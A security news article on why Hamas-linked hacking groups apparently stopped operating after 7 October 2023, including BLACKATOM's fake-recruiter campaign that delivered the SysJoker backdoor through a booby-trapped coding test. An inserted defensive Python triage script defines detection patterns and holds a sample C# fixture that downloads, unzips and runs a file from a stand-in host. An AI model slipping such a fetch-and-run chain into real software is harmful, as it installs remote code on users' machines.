Hamas Cyberattacks Ceased After the Oct. 7 Terror Attack. But Why?

Published: 23/11/2024   Category: security




Hamas-linked threat actors have defied norms, with no discernible uptick in cyber operations prior to the group's attack in Israel — and a complete abandonment of them thereafter.



Cyber threat actors linked with Hamas have seemingly ceased activity ever since the terrorist attack in Israel on Oct. 7, confounding experts.
Combination warfare is old hat in 2024. As Mandiant said in a newly published report, cyber operations have become a tool of first resort for any nation or nation-aligned group around the world engaged in protracted conflict, be it political, economic, or warlike in nature. Russia's invasion of Ukraine — preceded and supported by historic waves of cyber destruction, espionage, and misinformation — is, of course, the quintessence.
Not so in Gaza. If today's playbook is to support resource-intensive kinetic war with low-risk, low-investment cyber war, Hamas has thrown out the book.
"What we saw all through September 2023 was very typical Hamas-linked cyber espionage activities — their activity was very consistent with what we've seen for years," Kristen Dennesen, threat intelligence analyst for Google's Threat Analysis Group (TAG), said in a press conference this week. "That activity continued on until just before October 7 — there wasn't any kind of shift or uptick prior to that point. And since that time, we haven't seen any significant activity from these actors."
Failing to ramp up cyberattacks prior to Oct. 7 might be construed as strategic. But regarding why Hamas (irrespective of its supporters) has quit its cyber operations instead of using them to support its war effort, Dennesen admitted, "We don't offer any explanation as to why because we don't know."
Typical Hamas-nexus cyberattacks include "mass phishing campaigns to deliver malware or to steal email data," said Dennesen, as well as mobile spyware via various Android backdoors dropped via phishing. "And finally, in terms of their targeting: very persistent targeting of Israel, of Palestine, their regional neighbors in the Middle East, as well as targeting of the US and Europe," she explained.
For a case study in what that looks like, take BLACKATOM — one of the three primary Hamas-linked threat actors, alongside BLACKSTEM (aka MOLERATS, Extreme Jackal) and DESERTVARNISH (aka UNC718, Renegade Jackal, Desert Falcons, Arid Viper).
In September, BLACKATOM began a social engineering campaign aimed at software engineers in the Israeli Defense Forces (IDF), as well as Israel's defense and aerospace industries.
The ruse involved posing as employees of companies on LinkedIn and messaging targets with fake freelance job opportunities. After initial contact, the false recruiters would send a lure document with instructions for participating in a coding assessment.
The fake coding assessment required recipients to download a Visual Studio project, masquerading as a human resources management app, from an attacker-controlled GitHub or Google Drive page. Recipients were then asked to add features to the project, to demonstrate their coding skills. Contained within the project, though, was a function that secretly downloaded, extracted, and executed a malicious ZIP file on the affected computer. Inside the ZIP: the SysJoker multiplatform backdoor.
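For anyone handed such a "coding assessment," one triage step before opening or building the project is to look for source files that combine network download, archive extraction, and process execution. The Python script below is an added example, not code from the article, Mandiant, or Google TAG; the C#/.NET API names it matches and the sample files are assumptions constructed for illustration.

```python
import re

# Assumed C#/.NET API names; the article does not say what language the project used.
CAPABILITIES = {
    "download": re.compile(r"\b(WebClient|HttpClient|DownloadFile|DownloadData)\b"),
    "extract": re.compile(r"\b(ZipFile|ZipArchive|ExtractToDirectory)\b"),
    "execute": re.compile(r"\b(Process\.Start|ProcessStartInfo|Assembly\.Load)\b"),
}

def scan_source(text):
    """Return {capability: [line numbers]} for one source file."""
    hits = {name: [] for name in CAPABILITIES}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in CAPABILITIES.items():
            if pattern.search(line):
                hits[name].append(lineno)
    return hits

def triage_project(files):
    """files maps path -> source text; flag files that combine all three capabilities."""
    findings = []
    for path, text in sorted(files.items()):
        hits = scan_source(text)
        if all(hits.values()):  # download AND extract AND execute in one file
            findings.append((path, hits))
    return findings

# Constructed sample input: two benign files and one with the download/extract/run chain.
SAMPLE_PROJECT = {
    "HrApp/EmployeeService.cs": (
        "public class EmployeeService {\n"
        "    public Employee Find(int id) => _db.Employees.First(e => e.Id == id);\n"
        "}\n"
    ),
    "HrApp/PayrollClient.cs": "var http = new HttpClient();  // network use alone is not flagged\n",
    "HrApp/UpdateHelper.cs": (
        "public static class UpdateHelper {\n"
        "    public static void Check() {\n"
        '        new WebClient().DownloadFile("https://example.invalid/pkg.zip", "pkg.zip");\n'
        '        ZipFile.ExtractToDirectory("pkg.zip", "pkg");\n'
        '        Process.Start("pkg/setup.exe");\n'
        "    }\n"
        "}\n"
    ),
}

if __name__ == "__main__":
    for path, hits in triage_project(SAMPLE_PROJECT):
        print(f"REVIEW {path}: " + ", ".join(f"{k}@{v}" for k, v in hits.items()))
```

A hit is a prompt for manual review in an isolated environment, not a verdict: legitimate updaters show the same combination, and obfuscated or split-across-files code will not match.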
It may seem counterintuitive that Hamas' invasion wouldn't have been paired with a shift in its cyber activity akin to Russia's model. This may be due to its prioritization of operational security — the secrecy that made its Oct. 7 terror attack so shockingly effective.
Less explicable is why the most recent confirmed Hamas-related cyber activity, according to Mandiant, occurred back on Oct. 4. (Gaza, meanwhile, has suffered from significant Internet disruptions in recent months.)
"I think the key thing to draw out is that these are very different conflicts, with very different entities involved," said Shane Huntley, senior director at Google TAG. "Hamas is nothing like Russia. And therefore, it's not surprising that the use of cyber is very different [depending on] the nature of the conflict, between standing armies versus a sort of attack like we saw on October 7."
But Hamas likely has not fully retired its cyber operations. "While the outlook for future cyber operations by Hamas-linked actors is uncertain in the near term, we do anticipate that Hamas cyber activity will eventually resume. It should be focused on espionage for intelligence-gathering on these intra-Palestinian affairs, Israel, the United States, and other regional players in the Middle East," Dennesen noted.
